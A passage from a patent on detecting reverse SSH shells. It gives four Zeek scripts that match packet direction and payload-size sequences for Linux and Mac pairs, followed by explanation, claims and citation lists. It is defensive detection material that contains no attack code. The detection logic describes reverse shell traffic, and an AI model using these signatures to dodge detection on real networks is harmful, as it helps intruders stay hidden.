       lssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && lssh_conns[c$uid] >= 5 )
      {
       lssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl > 96 && lssh_conns[c$uid] >= 10 )
      {
       lssh_conns[c$uid] += 1;
       linux_echo[c$uid] = 1;
      }
      else { lssh_conns[c$uid] = 0; return; }
      if ( c$uid in linux_echo )
       {
       if ( linux_echo[c$uid] == 1 )
       {
        NOTICE([$note=SSH_Reverse_Shell,
        $conn = c,
        $msg = fmt(“Active SSH Reverse Shell from Linux: %s to
      Linux: %s:%s”, c$id$orig_h,c$id$resp_h,c$id$resp_p),
        $sub = “Consecutive characters typed into a reverse
        SSH shell followed by a return.”
       ]);
        linux_echo[c$uid] = 0;
        lssh_conns[c$uid] = 0;
       }
      }
    }
  • In the Sample Script No. 1 above, it tests for packet payload size of 96 bytes, for example, in this statement: if(is_src==T && p$tcp$dl=96 && lssh_conns[c$uid]==1). This packet size is selected as follows. In a normal shell connection, a single character may be encoded, for example, using ASCII. The payload (character) is encrypted and padded to a fixed number of bytes, depending on the system in use, in the example of Linux the padded size is 48 bytes. The shell server then acknowledges receipt of the character by sending it back to the client (echo), again 48 bytes, followed by a zero byte acknowledgment (ACK) packet. However, in the case of a reverse shell, the payloads are encrypted and padded in both directions, so the payload size is 96 bytes.
  • Sample Script No. 2—Linux to Mac Version
  •   # Detects when multiple characters have been typed into a
      reverse SSH shell and returned.
      # Linux to Mac version 1.0
      global lmssh_conns:table[string] of count &redef;
      global lm_echo:table[string] of count &redef;
      #redef enum Notice::Type += {SSH_Reverse_Shell};
      event ssh_server_version(c: connection, version: string)
      {
       if ( c$uid !in lmssh_conns )
       {
       lmssh_conns[c$uid] = 0;
       lm_echo[c$uid] = 0;
       }
       if ( c$uid !in lm_echo )
       {
       lm_echo[c$uid] = 0;
       }
      }
      event new_packet(c: connection, p: pkt_hdr)
      {
      ##if ( p$ip$p != 6 ) { return; } ## Doesn't work
      if ( ! c?$service ) { return; }
      if ( /SSH/ !in cat(c$service) ) { return; }
      local is_src:bool &default=F;
      if ( p$ip$src == c$id$orig_h ) { is_src = T; }
      if ( p$ip$src != c$id$orig_h ) { is_src = F; }
      if ( is_src == F && p$tcp$dl == 84 && lmssh_conns[c$uid] == 0 )
       {
        lmssh_conns[c$uid] += 1;
        return;
       }
      if ( is_src == T && p$tcp$dl == 84 && lmssh_conns[c$uid] == 1 )
      {
       lmssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && lmssh_conns[c$uid] == 2 )
      {
       lmssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 84 && lmssh_conns[c$uid] >= 3 )
       {
        lmssh_conns[c$uid] += 1;
       return;
       }
      if ( is_src == T && p$tcp$dl == 84 && lmssh_conns[c$uid] >= 4 )
      {
       lmssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && lmssh_conns[c$uid] >= 5 )
      {
       lmssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl > 84 && lmssh_conns[c$uid] >= 10 )
      {
       lmssh_conns[c$uid] += 1;
       lm_echo[c$uid] = 1;
      }
      else { lmssh_conns[c$uid] = 0; return; }
      if ( c$uid in lm_echo )
       {
       if ( lm_echo[c$uid] == 1 )
       {
        NOTICE([$note=SSH_Reverse_Shell,
        $conn = c,
        $msg = fmt(“Active SSH Reverse Shell from Linux: %s to
      Mac: %s:%s”, c$id$orig_h;c$id$resp_h,c$id$resp_p),
        $sub = “Consecutive characters typed into a reverse
        SSH shell followed by a return.”
       ]);
       lm_echo[c$uid] = 0;
       lmssh_conns[c$uid] = 0;
       }
       }
    }
  • In the Sample Script No. 2 above, it tests for packet payload size of 84 bytes. This value is based on a 42 byte payload, again doubled in the reverse direction. In this embodiment, it also tests for ACK packets following the echo packets, for example: “if (is_src=F && p$tcp$dl=0 && lmssh_conns[c$uid]=2).”
  • Sample Script No. 3—Mac to Linux Version
  •   # Detects when multiple characters have been typed into a
      reverse SSH shell and returned.
      # Mac to Linux version 1.0
      global mssh_conns:table[string] of count &redef;
      global mac_echo:table[string] of count &redef;
      #redef enum Notice: Type += {SSH_Reverse_Shell};
      event ssh_server_version(c: connection, version: string)
      {
       if ( c$uid !in mssh_conns )
       {
       mssh_conns[c$uid] = 0;
       mac_echo[c$uid] = 0;
       }
       if ( c$uid !in mac_echo )
       {
       mac_echo[c$uid] = 0;
       }
      }
      event new_packet(c: connection, p: pkt_hdr)
      {
      ##if ( p$ip$p != 6) { return; } ## Doesn't work
      if ( ! c?$service ) { return; }
      if ( /SSH/ !in cat(c$service) ) { return; }
      local is_src:bool &default=F;
      if ( p$ip$src == c$id$orig_h ) { is_src = T; }
      if ( p$ip$src != c$id$orig_h ) { is_src = F; }
      if ( is_src == F && p$tcp$dl == 96 && mssh_conns[c$uid] == 0 )
      {
        mssh_conns[c$uid] += 1;
        return;
      }
      if ( is_src == T && p$tcp$dl == 0 && mssh_conns[c$uid] == 1 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 96 && mssh_conns[c$uid] == 2 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && mssh_conns[c$uid] == 3 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 96 && mssh_conns[c$uid] >= 4 )
      {
        mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 0 && mssh_conns[c$uid] >= 5 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 96 && mssh_conns[c$uid] >= 6 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && mssh_conns[c$uid] >= 7 )
      {
       mssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl > 96 && mssh_conns[c$uid] >= 12 )
      {
       mssh_conns[c$uid] += 1;
       mac_echo[c$uid] = 1;
      }
      else { mssh_conns[c$uid] = 0; return; }
      if ( c$uid in mac_echo )
       {
       if ( mac_echo[c$uid] == 1 )
       {
        NOTICE([$note=SSH_Reverse_Shell,
        $conn = c,
        $msg = fmt(“Active SSH Reverse Shell from Mac: %s to
      Linux: %s:%s”, c$id$orig_h,c$id$resp_h,c$id$resp_p),
        $sub = “Consecutive characters typed into a reverse
        SSH shell followed by a return.”
       ]);
       mac_echo[c$uid] = 0;
       mssh_conns[c$uid] = 0;
       }
      }
    }
  • Sample Script No. 4—Mac to Ubuntu Version
  •   # Detects when multiple characters have been typed into a
      reverse SSH shell and returned.
      # Mac to Ubuntu version 1.0
      global mussh_conns:table[string] of count &redef;
      global macu_echo:table[string] of count &redef;
      #redef enum Notice::Type += {SSH_Reverse_Shell};
      event ssh_server_version(c: connection, version: string)
      {
       if ( c$uid !in mussh_conns )
       {
       mussh_conns[c$uid] = 0;
       macu_echo[c$uid] = 0;
       }
       if ( c$uid !in macu_echo )
       {
       macu_echo[c$uid] = 0;
       }
      }
      event new_packet(c: connection, p: pkt_hdr)
      {
      ##if ( p$ip$p != 6 ) { return; } ## Doesn't work
      if ( ! c?$service ) { return; }
      if ( /SSH/ !in cat(c$service) ) { return; }
      local is_src:bool &default=F;
      if ( p$ip$src == c$id$orig_h ) { is_src = T; }
      if ( p$ip$src != c$id$orig_h ) { is_src = F; }
      if ( is_src == F && p$tcp$dl == 84 && mussh_conns[c$uid] == 0 )
      {
        mussh_conns[c$uid] += 1;
        return;
      }
      if ( is_src == T && p$tcp$dl == 0 && mussh_conns[c$uid] == 1 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 84 && mussh_conns[c$uid] == 2 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && mussh_conns[c$uid] == 3 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 84 && mussh_conns[c$uid] >= 4 )
      {
        mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 0 && mussh_conns[c$uid] >= 5 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl == 84 && mussh_conns[c$uid] >= 6 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && mussh_conns[c$uid] >= 7 )
      {
       mussh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == T && p$tcp$dl > 84 && mussh_conns[c$uid] >= 12 )
      {
       mussh_conns[c$uid] += 1;
       macu_echo[c$uid] = 1;
      }
      else { mussh_conns[c$uid] = 0; return; }
      if ( c$uid in macu_echo )
       {
       if ( macu_echo[c$uid] == 1 )
       {
        NOTICE([$note=SSH_Reverse_Shell,
        $conn = c,
        $msg = fmt(“Active SSH Reverse Shell from Mac: %s to
      Ubuntu: %s:%s”, c$id$orig_h,c$id$resp_h,c$id$resp_p),
        $sub = “Consecutive characters typed into a reverse
        SSH shell followed by a return.”
       ]);
       macu_echo[c$uid] = 0;
       mussh_conns[c$uid] = 0;
       }
       }
    }
  • The four scripts above are not intended to be limiting of the scope of the invention. Rather, they merely illustrate possible embodiments for some of the more common operating systems at this time.
  • A reverse shell connection is not always unwelcome or an intrusion. It is commonplace for authorized users, for example, system administrators, to legitimately access networks or client systems from a remote or “foreign” network via a reverse shell connection. FIG. 5 illustrates a process to essentially ignore reverse shell connections by previously authorized users or hosts. This may be done, in some embodiments, by the use of a “whitelist” of system addresses that are authorized to utilize reverse shell access. In FIG. 5, a process 500 waits for, or is triggered by, detection of a reverse shell connection, block 510. In some embodiments, block 450 of the process 400 may incorporate or link to the process 500. At block 512, the process identifies the location or address of the foreign system that is using the reverse connection. For example, an NIDS or a script such as those above executable on an NIDS can provide this information. The foreign system address may be compared to a preexisting list of permitted or authorized addresses on a whitelist, decision block 514. If the address is on the authorized list, the process may loop via path 515 to standby mode. If the address is not on the authorized list, the process 500 may continue to identify the current shell as hosting a reverse shell session. Here we use the term “hosting” in the sense of the reverse session utilizing an existing shell session that originated at a client system such as discussed above with regard to FIG. 3B.
  • Based on identifying the secure shell session as hosting a reverse shell session, where the foreign system is not authorized, the process 500 may include taking a predetermined action comprising, for example, one or more of a set of actions that may include (a) sending a notification to a predetermined destination, (b) sending a reset command over the network to terminate the shell session, (c) logging the reverse shell session including an identifier of the foreign server, or (d) executing an intrusion script to take other actions.
  • CONCLUSION
  • While one or more implementations have been described by way of example and in terms of the specific embodiments, it is to be understood that one or more implementations are not limited to the disclosed embodiments. To the contrary, it is intended to cover various modifications and similar arrangements as would be apparent to those skilled in the art. Therefore, the scope of the appended claims should be accorded the broadest interpretation so as to encompass all such modifications and similar arrangements.

Claims (20)

1. A computer-implemented method for use in a database system, the database system including a client system coupled to an internal network receiving communication traffic over a network connection to an external network, the method comprising:
detecting a secure shell session established by the client system over the network connection with a foreign server coupled to the external network;
monitoring packets in the secure shell session;
determining a transmission direction and a payload size of each of the packets;
analyzing the transmission directions and payload sizes of a first sequence of the packets relative to a predetermined pattern;
based on the first sequence of packets matching the pattern, assessing a payload size of a response to the first sequence of packets from the client system to the foreign server; and
identifying the secure shell session as hosting a reverse shell session based on the response payload size exceeding a predetermined threshold.
2. The method of claim 1 wherein the predetermined pattern comprises the following sequence of packets—
a first reverse packet, wherein a reverse packet is defined as having a transmission direction from the foreign server to the client system;
next following the first reverse packet, a first forward packet, wherein a forward packet is defined as having a transmission direction from the client system to the foreign server;
next following the first forward packet, a second reverse packet; and
next following the second reverse packet, a second forward packet;
wherein the first and second forward packets, and the first and second reverse packets, all have a common predetermined payload size, the predetermined payload size corresponding to a single character, encrypted and padded.
3. The method of claim 2 wherein the predetermined pattern further includes:
next following the second forward packet, at least one additional pair of packets having the same predetermined payload size, wherein a pair of packets is defined as a reverse packet followed by a forward packet, so that the predetermined pattern corresponds to a sequence of at least three characters transmitted form the foreign server to the client system.
4. The method of claim 1 wherein detecting the secure shell session includes identifying a type of a shell client component that established the secure shell session, and further comprising a step of selecting the predetermined payload size based on the identified type of shell client component.
5. The method of claim 1 wherein the predetermined pattern further comprises at least one zero payload acknowledgement (ACK) packet having a transmission direction from the client system to the foreign server, immediately following a forward packet.
6. The method of claim 1 wherein the predetermined threshold for the response payload size is greater than the predetermined payload size.
7. The method of claim 1 and further comprising, responsive to identifying the secure shell session as hosting a reverse shell session, taking a predetermined action comprising one or more of a set of actions comprising (a) sending a notification to a predetermined destination, (b) sending a reset command over the network to terminate the shell session, (c) logging the reverse shell session including an identifier of the foreign server, or (d) executing an intrusion script to take other actions.
8. The method of claim 1 and further comprising:
responsive to identifying the secure shell session as hosting a reverse shell session, comparing an identifier of the foreign server to a predetermined whitelist of servers authorized to conduct a reverse shell session with the client system; and
executing a selected action based on a result of the comparison.
9. A system comprising:
an internal network for packet-switched communications;
a client system coupled to the internal network;
a network interface component coupled to the internal network to implement packet-switched communications between the internal network and an external network;
a network intrusion detection component coupled to the network interface component to detect a reverse secure shell session between the client system and a foreign server coupled to the external network;
the intrusion detection component arranged to—
inspect packets in a secure shell session traversing the network interface component;
analyze transmission directions and payload sizes of a sequence of the packets relative to a predetermined pattern;
based on the first sequence of packets matching the pattern, determining a payload size of a response packet transmitted to from the client system to the foreign server; and
identifying the secure shell session as hosting a reverse shell session based on the response payload packet size exceeding the payload sizes of the sequence of packets.
10. The system of claim 9 including a network traffic analyzer coupled to the network interface component, wherein the network intrusion detection component comprises a script stored in a non-transitive, tangible machine-readable media for execution in association with the network traffic analyzer.
11. The system of claim 9 wherein the network intrusion detection component is implemented in a server coupled to monitor packet traffic between the internal network and the external network.
12. The system of claim 9 wherein the predetermined pattern comprises the following sequence of packets—
a first reverse packet, wherein a reverse packet is defined as having a transmission direction from the foreign server to the client system;
next following the first reverse packet, a first forward packet, wherein a forward packet is defined as having a transmission direction from the client system to the foreign server;
next following the first forward packet, a second reverse packet; and
next following the second reverse packet, a second forward packet;
wherein the first and second forward packets, and the first and second reverse packets, all have a common predetermined payload size corresponding to a single character, encrypted and padded.
13. The system of claim 9 wherein the predetermined pattern further comprises at least one acknowledgement (ACK) packet having a transmission direction from the client system to the foreign server, and interleaved after a forward packet.
14. The system of claim 9 wherein the predetermined pattern comprises the following sequence of packets—
(a) a first packet having a transmission direction from the foreign server to the client system, and having a predetermined packet payload size corresponding to a single character, encrypted and padded;
(b) a second packet having a transmission direction from the client system to the foreign server, and having the predetermined packet payload size;
(c) a third packet having a transmission direction from the client system to the foreign server and comprising a zero-bytes ACK packet;
(d) the above sequence (a), (b), (c) repeated at least three times uninterrupted; and then
(e) a next packet having a transmission direction from the client system to the foreign server, and having a payload size greater than the predetermined packet payload size.
15. The system of claim 9 wherein the predetermined packet payload size is 96 bytes.
16. A non-transitive, tangible media storing a machine-readable script for detecting a reverse secure shell session, the script including instructions executable in a network traffic analyzer to—
detect a secure shell session established by the client system over the network connection with a foreign server coupled to the external network;
monitor packets in the secure shell session;
determine a transmission direction and a payload size of each of the packets;
analyze the transmission directions and payload sizes of a first sequence of the packets relative to a predetermined pattern;
based on the first sequence of packets matching the pattern, determine a payload size of a response to the first sequence of packets from the client system to the foreign server; and
send a message identifying the secure shell session as hosting a reverse shell session based on the response payload size exceeding a predetermined threshold.
17. The tangible media of claim 16 wherein the script further includes instructions to, responsive to identifying the secure shell session as hosting a reverse shell session—
execute a predetermined action comprising one or more of a set of actions comprising (a) sending a notification to a predetermined address, (b) sending a reset command over the network to terminate the shell session, (c) logging the reverse shell session including an identifier of the foreign server, and (d) executing an intrusion script to take other actions.
18. The tangible media of claim 16 wherein the script includes instructions to identify an operating system of a shell client component that established the secure shell session, and to select the predetermined payload size based at least in part on the identified operating system of the client component.
19. The tangible media of claim 16 wherein the script includes instructions to—
access a whitelist of IP addresses;
compare an IP address of the foreign server to the whitelist; and
execute a predetermined action based on the comparison.
20. The tangible media of claim 16 wherein the script includes instructions to—
access a blacklist of IP addresses;
compare an IP address of the foreign server to the blacklist; and
execute a predetermined action based on the comparison.
US15/158,367 2016-05-18 2016-05-18 Reverse shell network intrusion detection Active 2036-11-19 US10135847B2 (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
US15/158,367 US10135847B2 (en) 2016-05-18 2016-05-18 Reverse shell network intrusion detection

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
US15/158,367 US10135847B2 (en) 2016-05-18 2016-05-18 Reverse shell network intrusion detection

Publications (2)

Publication Number Publication Date
US20170339166A1 true US20170339166A1 (en) 2017-11-23
US10135847B2 US10135847B2 (en) 2018-11-20

Family

ID=60330611

Family Applications (1)

Application Number Title Priority Date Filing Date
US15/158,367 Active 2036-11-19 US10135847B2 (en) 2016-05-18 2016-05-18 Reverse shell network intrusion detection

Country Status (1)

Country Link
US (1) US10135847B2 (en)

Cited By (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20180077201A1 (en) * 2016-09-15 2018-03-15 Paypal, Inc. Enhanced Security Techniques for Remote Reverse Shell Prevention
US20180255076A1 (en) * 2017-03-02 2018-09-06 ResponSight Pty Ltd System and Method for Cyber Security Threat Detection
CN111049781A (en) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 A method, device, device and storage medium for detecting a rebound network attack
US20210176211A1 (en) * 2017-03-23 2021-06-10 Pismo Labs Technology Limited Method and system for restricting transmission of data traffic for devices with networking capabilities
CN113515743A (en) * 2021-03-23 2021-10-19 杭州安恒信息技术股份有限公司 Identification method and device of call chain of rebound shell process and electronic device
CN114064981A (en) * 2021-11-17 2022-02-18 北京安天网络安全技术有限公司 Reverse shell process detection method and device, electronic equipment, computer storage medium and program product
US11489849B2 (en) 2020-01-14 2022-11-01 Saudi Arabian Oil Company Method and system for detecting and remediating malicious code in a computer network
US20230328045A1 (en) * 2022-04-08 2023-10-12 Xilinx, Inc. Secure shell and role isolation for multi-tenant compute
CN117201072A (en) * 2023-07-31 2023-12-08 北京天融信网络安全技术有限公司 User password acquisition method, device, equipment and storage medium

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US11190420B2 (en) 2018-10-31 2021-11-30 Salesforce.Com, Inc. Generating events from host based logging for consumption by a network logging host
US12041088B2 (en) 2021-03-24 2024-07-16 Corelight, Inc. System and method for identifying authentication method of secure shell (SSH) sessions
US11729217B2 (en) * 2021-03-24 2023-08-15 Corelight, Inc. System and method for determining keystrokes in secure shell (SSH) sessions
US11165675B1 (en) 2021-04-19 2021-11-02 Corelight, Inc. System and method for network traffic classification using snippets and on the fly built classifiers

Citations (19)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20050081119A1 (en) * 2003-08-08 2005-04-14 Dizoglio Marc Real time data storage monitoring and administration
US20050157662A1 (en) * 2004-01-20 2005-07-21 Justin Bingham Systems and methods for detecting a compromised network
US20060021031A1 (en) * 2004-06-30 2006-01-26 Scott Leahy Method and system for preventing fraudulent activities
US20060031928A1 (en) * 2004-08-09 2006-02-09 Conley James W Detector and computerized method for determining an occurrence of tunneling activity
US7283565B1 (en) * 2001-12-27 2007-10-16 Cypress Semiconductor Corporation Method and apparatus for framing a data packet
US8151348B1 (en) * 2004-06-30 2012-04-03 Cisco Technology, Inc. Automatic detection of reverse tunnels
US20130117205A1 (en) * 2010-03-17 2013-05-09 Thales Method of identifying a protocol giving rise to a data flow
US8620874B1 (en) * 2008-06-10 2013-12-31 Netapp, Inc. Application recovery from network-induced data corruption
US20140115705A1 (en) * 2012-10-22 2014-04-24 Fujitsu Limited Method for detecting illegal connection and network monitoring apparatus
US8869268B1 (en) * 2007-10-24 2014-10-21 Symantec Corporation Method and apparatus for disrupting the command and control infrastructure of hostile programs
US20150058916A1 (en) * 2011-08-31 2015-02-26 Palo Alto Networks, Inc. Detecting encrypted tunneling traffic
US20150326592A1 (en) * 2014-05-07 2015-11-12 Attivo Networks Inc. Emulating shellcode attacks
US20150326600A1 (en) * 2013-12-17 2015-11-12 George KARABATIS Flow-based system and method for detecting cyber-attacks utilizing contextual information
US20160057167A1 (en) * 2014-08-21 2016-02-25 Salesforce.Com, Inc. Phishing and threat detection and prevention
US20160338120A1 (en) * 2015-05-14 2016-11-17 Smart Technologies, Ulc System And Method Of Communicating Between Interactive Systems
US20160359887A1 (en) * 2015-06-04 2016-12-08 Cisco Technology, Inc. Domain name system (dns) based anomaly detection
US20160381051A1 (en) * 2015-06-27 2016-12-29 Mcafee, Inc. Detection of malware
US20170034192A1 (en) * 2015-07-28 2017-02-02 Sap Se Contextual monitoring and tracking of ssh sessions
US20170223032A1 (en) * 2014-02-28 2017-08-03 British Telecommunications Public Limited Company Malicious encrypted traffic inhibitor

Family Cites Families (149)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US5649104A (en) 1993-03-19 1997-07-15 Ncr Corporation System for allowing user of any computer to draw image over that generated by the host computer and replicating the drawn image to other computers
US5608872A (en) 1993-03-19 1997-03-04 Ncr Corporation System for allowing all remote computers to perform annotation on an image and replicating the annotated image on the respective displays of other comuters
US7991347B1 (en) 1994-04-07 2011-08-02 Data Innovation Llc System and method for accessing set of digital data at a remote site
US5577188A (en) 1994-05-31 1996-11-19 Future Labs, Inc. Method to provide for virtual screen overlay
US7181758B1 (en) 1994-07-25 2007-02-20 Data Innovation, L.L.C. Information distribution and processing system
GB2300991B (en) 1995-05-15 1997-11-05 Andrew Macgregor Ritchie Serving signals to browsing clients
JPH10504127A (en) 1995-06-09 1998-04-14 フィリップス エレクトロニクス ネムローゼ フェンノートシャップ Method for enabling a user to derive a particular information item from a set of information items, and a system for performing such a method
US5715450A (en) 1995-09-27 1998-02-03 Siebel Systems, Inc. Method of selecting and presenting data from a database using a query language to a user of a computer system
US5821937A (en) 1996-02-23 1998-10-13 Netsuite Development, L.P. Computer method for updating a network design
US5831610A (en) 1996-02-23 1998-11-03 Netsuite Development L.P. Designing networks
US5873096A (en) 1997-10-08 1999-02-16 Siebel Systems, Inc. Method of maintaining a network of partially replicated database system
US6604117B2 (en) 1996-03-19 2003-08-05 Siebel Systems, Inc. Method of maintaining a network of partially replicated database system
WO1998040804A2 (en) 1997-02-26 1998-09-17 Siebel Systems, Inc. Distributed relational database
WO1998038586A1 (en) 1997-02-26 1998-09-03 Siebel Systems, Inc. Method of determining the visibility to a remote databaseclient of a plurality of database transactions using simplified visibility rules
WO1998038587A1 (en) 1997-02-26 1998-09-03 Siebel Systems, Inc. Method of using a cache to determine the visibility to a remote database client of a plurality of database transactions
AU6183698A (en) 1997-02-26 1998-09-18 Siebel Systems, Inc. Method of determining visibility to a remote database client of a plurality of database transactions having variable visibility strengths
WO1998038762A2 (en) 1997-02-26 1998-09-03 Siebel Systems, Inc. Determining visibility to a remote database client
WO1998040805A2 (en) 1997-02-27 1998-09-17 Siebel Systems, Inc. Method of synchronizing independently distributed software and database schema
WO1998040807A2 (en) 1997-02-27 1998-09-17 Siebel Systems, Inc. Migrating to a successive software distribution level
EP1015997A4 (en) 1997-02-28 2006-03-29 Siebel Systems Inc Partially replicated distributed database with multiple levels of remote clients
US5983227A (en) 1997-06-12 1999-11-09 Yahoo, Inc. Dynamic page generator
US6169534B1 (en) 1997-06-26 2001-01-02 Upshot.Com Graphical user interface for customer information management
US5918159A (en) 1997-08-04 1999-06-29 Fomukong; Mundi Location reporting satellite paging system with optional blocking of location reporting
US6560461B1 (en) 1997-08-04 2003-05-06 Mundi Fomukong Authorized location reporting paging system
US6236978B1 (en) 1997-11-14 2001-05-22 New York University System and method for dynamic profiling of users in one-to-one applications
US20020059095A1 (en) 1998-02-26 2002-05-16 Cook Rachael Linette System and method for generating, capturing, and managing customer lead information over a computer network
US6732111B2 (en) 1998-03-03 2004-05-04 Siebel Systems, Inc. Method, apparatus, system, and program product for attaching files and other objects to a partially replicated database
US6161149A (en) 1998-03-13 2000-12-12 Groupserve, Inc. Centrifugal communication and collaboration method
US6772229B1 (en) 2000-11-13 2004-08-03 Groupserve, Inc. Centrifugal communication and collaboration method
US5963953A (en) 1998-03-30 1999-10-05 Siebel Systems, Inc. Method, and system for product configuration
JP2002523842A (en) 1998-08-27 2002-07-30 アップショット・コーポレーション Method and apparatus for network-based sales force management
AU6410699A (en) 1998-10-13 2000-05-01 Chris Cheah Method and system for controlled distribution of information over a network
US6393605B1 (en) 1998-11-18 2002-05-21 Siebel Systems, Inc. Apparatus and system for efficient delivery and deployment of an application
US6601087B1 (en) 1998-11-18 2003-07-29 Webex Communications, Inc. Instant document sharing
US6728960B1 (en) 1998-11-18 2004-04-27 Siebel Systems, Inc. Techniques for managing multiple threads in a browser environment
EP1196882A1 (en) 1998-11-30 2002-04-17 Siebel Systems, Inc. Smart scripting call centers
EP1163604A4 (en) 1998-11-30 2002-01-09 Siebel Systems Inc Assignment manager
AU2034500A (en) 1998-11-30 2000-06-19 Siebel Systems, Inc. State models for monitoring processes
EP1135723A4 (en) 1998-11-30 2005-02-16 Siebel Systems Inc Development tool, method, and system for client server applications
US7356482B2 (en) 1998-12-18 2008-04-08 Alternative Systems, Inc. Integrated change management unit
US6574635B2 (en) 1999-03-03 2003-06-03 Siebel Systems, Inc. Application instantiation based upon attributes and values stored in a meta data repository, including tiering of application layers objects and components
US20020072951A1 (en) 1999-03-03 2002-06-13 Michael Lee Marketing support database management method, system and program product
US6288717B1 (en) 1999-03-19 2001-09-11 Terry Dunkle Headline posting algorithm
US6907566B1 (en) 1999-04-02 2005-06-14 Overture Services, Inc. Method and system for optimum placement of advertisements on a webpage
US7698160B2 (en) 1999-05-07 2010-04-13 Virtualagility, Inc System for performing collaborative tasks
US8095413B1 (en) 1999-05-07 2012-01-10 VirtualAgility, Inc. Processing management information
US6411949B1 (en) 1999-08-12 2002-06-25 Koninklijke Philips Electronics N.V., Customizing database information for presentation with media selections
US6621834B1 (en) 1999-11-05 2003-09-16 Raindance Communications, Inc. System and method for voice transmission over network protocols
US6535909B1 (en) 1999-11-18 2003-03-18 Contigo Software, Inc. System and method for record and playback of collaborative Web browsing session
US6671714B1 (en) 1999-11-23 2003-12-30 Frank Michael Weyer Method, apparatus and business system for online communications with online and offline recipients
US6324568B1 (en) 1999-11-30 2001-11-27 Siebel Systems, Inc. Method and system for distributing objects over a network
US6654032B1 (en) 1999-12-23 2003-11-25 Webex Communications, Inc. Instant sharing of documents on a remote server
US7136860B2 (en) 2000-02-14 2006-11-14 Overture Services, Inc. System and method to determine the validity of an interaction on a network
US7266502B2 (en) 2000-03-31 2007-09-04 Siebel Systems, Inc. Feature centric release manager method and system
US6336137B1 (en) 2000-03-31 2002-01-01 Siebel Systems, Inc. Web client-server system and method for incompatible page markup and presentation languages
US6732100B1 (en) 2000-03-31 2004-05-04 Siebel Systems, Inc. Database access method and system for user role defined access
US6577726B1 (en) 2000-03-31 2003-06-10 Siebel Systems, Inc. Computer telephony integration hotelling method and system
US6842748B1 (en) 2000-04-14 2005-01-11 Rightnow Technologies, Inc. Usage based strength between related information in an information retrieval system
US6665655B1 (en) 2000-04-14 2003-12-16 Rightnow Technologies, Inc. Implicit rating of retrieved information in an information search system
US7730072B2 (en) 2000-04-14 2010-06-01 Rightnow Technologies, Inc. Automated adaptive classification system for knowledge networks
US6434550B1 (en) 2000-04-14 2002-08-13 Rightnow Technologies, Inc. Temporal updates of relevancy rating of retrieved information in an information search system
US6763501B1 (en) 2000-06-09 2004-07-13 Webex Communications, Inc. Remote document serving
EP1307831A4 (en) 2000-07-11 2007-05-09 Yahoo Inc Online playback system with community bias
US7069231B1 (en) 2000-07-20 2006-06-27 Oracle International Corporation Methods and systems for defining, applying and executing customer care relationship plans
KR100365357B1 (en) 2000-10-11 2002-12-18 엘지전자 주식회사 Method for data communication of mobile terminal
US7581230B2 (en) 2001-02-06 2009-08-25 Siebel Systems, Inc. Adaptive communication application programming interface
USD454139S1 (en) 2001-02-20 2002-03-05 Rightnow Technologies Display screen for a computer
US7310687B2 (en) 2001-03-23 2007-12-18 Cisco Technology, Inc. Methods and systems for managing class-based condensation
US6829655B1 (en) 2001-03-28 2004-12-07 Siebel Systems, Inc. Method and system for server synchronization with a computing device via a companion device
US7363388B2 (en) 2001-03-28 2008-04-22 Siebel Systems, Inc. Method and system for direct server synchronization with a computing device
US7174514B2 (en) 2001-03-28 2007-02-06 Siebel Systems, Inc. Engine to present a user interface based on a logical structure, such as one for a customer relationship management system, across a web site
US20030018705A1 (en) 2001-03-31 2003-01-23 Mingte Chen Media-independent communication server
US20030206192A1 (en) 2001-03-31 2003-11-06 Mingte Chen Asynchronous message push to web browser
US6732095B1 (en) 2001-04-13 2004-05-04 Siebel Systems, Inc. Method and apparatus for mapping between XML and relational representations
US7761288B2 (en) 2001-04-30 2010-07-20 Siebel Systems, Inc. Polylingual simultaneous shipping of software
US6728702B1 (en) 2001-06-18 2004-04-27 Siebel Systems, Inc. System and method to implement an integrated search center supporting a full-text search and query on a database
US6711565B1 (en) 2001-06-18 2004-03-23 Siebel Systems, Inc. Method, apparatus, and system for previewing search results
US6782383B2 (en) 2001-06-18 2004-08-24 Siebel Systems, Inc. System and method to implement a persistent and dismissible search center frame
US6763351B1 (en) 2001-06-18 2004-07-13 Siebel Systems, Inc. Method, apparatus, and system for attaching search results
US20030004971A1 (en) 2001-06-29 2003-01-02 Gong Wen G. Automatic generation of data models and accompanying user interfaces
US6826582B1 (en) 2001-09-28 2004-11-30 Emc Corporation Method and system for using file systems for content management
